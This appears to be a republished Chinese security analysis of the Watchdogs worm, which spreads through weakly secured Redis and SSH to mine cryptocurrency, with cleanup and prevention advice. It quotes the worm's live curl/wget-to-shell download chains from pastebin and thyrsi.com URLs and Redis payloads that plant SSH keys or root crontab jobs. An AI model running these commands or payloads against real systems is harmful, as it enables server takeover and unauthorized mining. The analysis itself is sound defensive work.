Watchdogs怎样利用实施大规模挖矿

这篇文章给大家介绍Watchdogs怎样利用实施大规模挖矿,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

成都创新互联公司2013年成立,先为弋阳等服务建站,弋阳等地企业,进行企业商务咨询服务。为弋阳企业网站制作PC+手机+微官网三网同步一站式服务解决您的所有建站问题。

背景

2月20日17时许,阿里云安全监测到一起大规模挖矿事件,判断为Watchdogs蠕虫导致,并在第一时间进行了应急处置。

该蠕虫短时间内即造成大量Linux主机沦陷,一方面是利用redis未授权访问和弱密码这两种常见的配置问题进行传播,另一方面从known_hosts文件读取ip列表,用于登录信任该主机的其他主机。这两种传播手段都不是第一次用于蠕虫,但结合在一起爆发出巨大的威力。

然而Watchdogs并不是第一个造成这般影响的Redis蠕虫。截至目前,Redis配置问题已惨遭40余种蠕虫攻击和利用;此外,其他种类数据库的配置问题,也难保不在将来成为黑客的目标。

因此,如何在分析此次Watchdogs挖矿蠕虫、提供清理建议的同时,也分析了数据库蠕虫的发展趋势,并针对类似的大规模入侵事件的应急和预防给出建议。

Watchdogs 挖矿蠕虫简介

该蠕虫的感染路径如下图所示。

Watchdogs怎样利用实施大规模挖矿cdn.com/2263586317fbd3bd3031398a8e039908aaa6f9f9.png">

蠕虫传播方式

攻击者首先扫描存在未授权访问或弱密码的Redis,并控制相应主机去请求以下地址:

https://pastebin.com/raw/sByq0rym

该地址包含的命令是请求、base64解码并执行另一个url地址的内容:

(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh

而https://pastebin.com/raw/D8E71JBJ 的内容解码后为一个bash脚本,脚本中又包含下载恶意程序Watchdogs的指令。

(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

如上图所示,本次蠕虫的横向传播分为两块。

一是Bash脚本包含的如下内容,会直接读取主机上的/root/.ssh/known_hosts和/root/.ssh/id_rsa.pub文件,用于登录信任当前主机的机器,并控制这些机器执行恶意指令。

二是Bash脚本下载的Watchdogs程序,通过对Redis的未授权访问和爆破、以及对SSH的爆破,进行横向传播。

具体为表现为,Watchdogs程序的Bbgo()函数中,首先获取要攻击的ip列表
Watchdogs怎样利用实施大规模挖矿

随后尝试登录其他主机的ssh服务,一旦登录成功则执行恶意脚本下载命令
Watchdogs怎样利用实施大规模挖矿

恶意Bash脚本

除了下载Watchdogs程序和横向传播外,Bash脚本还具有以下几项功能

1.将下载自身的指令添加到crontab定时任务,10分钟执行一次
Watchdogs怎样利用实施大规模挖矿

杀死cpu占用大于80%的其他进程
Watchdogs怎样利用实施大规模挖矿

1.LibiosetWrite()

该函数主要执行libioset.so文件的写入
Watchdogs怎样利用实施大规模挖矿

3.KsoftirqdsWriteRun()
解压并写入挖矿程序及其配置文件
Watchdogs怎样利用实施大规模挖矿

这里以执行rm命令必须调用的unlink()函数为例。

它只对不包含"ksoftirqds"、"ld.so.preload"、"libioset.so"这几个字符串的文件调用正常的unlink(),导致几个文件无法被正常删除。
Watchdogs怎样利用实施大规模挖矿

其中forge_proc_cpu()函数,将返回硬编码的字符串

Watchdogs怎样利用实施大规模挖矿

而Redis本身遭受攻击的主流方法也经过了三个阶段

1.攻击者对存在未授权访问的Redis服务器写入ssh key,从而可以畅通无阻登录ssh服务

具体为执行以下payload

config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa 【sshkey】 root@kali\n\n\n"
save

其中【sshkey】表示攻击者的密钥

2.攻击者对存在未授权访问的Redis服务器写入crontab文件,定时执行恶意操作

具体为执行以下payload

config set dir /var/spool/cron
config set dbfilename root
set x "【evil command】"
save

其中【evil command】表示定时执行的恶意命令

3.以上两个阶段中仅对Redis完全没有验证即可访问的情况,第三个阶段则开始针对设置了密码验证,但密码较弱的Redis进行攻击,受害范围进一步扩大。

然而Redis并不是唯一一个受到黑客“青眼”的数据库。如下表所示,SQL Server, MySQL, MongoDB这些常用数据库的安全问题,也被多个挖矿僵尸网络所利用;利用方式集中在未授权访问、密码爆破和漏洞利用。

Watchdogs入侵修复及清理方法

1.首先停止cron服务,避免因其不断执行而导致恶意文件反复下载执行。

如果操作系统可以使用service命令,则执行

service crond stop

如果没有service命令,执行

/etc/init.d/cron stop

2.随后使用busybox删除以下两个so文件:

sudo busybox rm -f /etc/ld.so.preload
sudo busybox rm -f /usr/local/lib/libioset.so
sudo ldconfig

busybox是一个小巧的unix工具集,许多Linux系统装机时已集成。使用它进行删除是因为系统自带的rm命令需要进行动态so库调用,而so库被恶意hook了,无法进行正常删除;而busybox的rm是静态编译的,无需调用so文件,所以不受影响。

3.清理恶意进程

sudo kill -9 `ps -ef|grep Watchdogs|grep -v grep |awk '{print $2}'`
sudo kill -9 `ps -ef|grep ksoftirqds|grep -v grep |awk '{print $2}'`

4.清理cron相关文件,重启服务,具体为检查以下文件并清除其中的恶意指令:

/var/spool/cron/crontabs/root
/var/spool/cron/root
/etc/cron.d/root

之后执行

service crond start

/etc/init.d/cron start

安全建议

数字加密货币的获取依赖计算资源的特质,催生了黑客进行大规模入侵的动机和土壤;类似Watchdogs蠕虫这样的数据库入侵事件,不是第一起,也不会是最后一起。阿里云作为“编写时即考虑安全性”的平台,提供良好的安全基础设施和丰富的安全产品,帮助用户抵御挖矿和入侵,同时提供以下安全建议:

1.在入侵发生之前,加强数据库服务的密码,尽量不将数据库服务开放在互联网上,或根据实际情况进行访问控制(ACL)。这些措施能够帮助有效预防挖矿、勒索等攻击。平时还要注意备份资料,重视安全产品告警。

2.如果怀疑主机已被入侵挖矿,对于自身懂安全的用户,在攻击者手段较简单的情况下,可以通过自查cpu使用情况、运行进程、定时任务等方式,锁定入侵源头。

3.对于攻击者采用较多隐藏手段的攻击(如本次的Watchdogs蠕虫,使ps、top等系统命令失效),建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽pastebin.com、thrysi.com等广泛被挖矿蠕虫利用的网站,达到阻断入侵的目的。

  1. Watchdogs怎样利用实施大规模挖矿

    关于Watchdogs怎样利用实施大规模挖矿就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


    分享文章:Watchdogs怎样利用实施大规模挖矿
    分享路径:http://pwwzsj.com/article/jegcss.html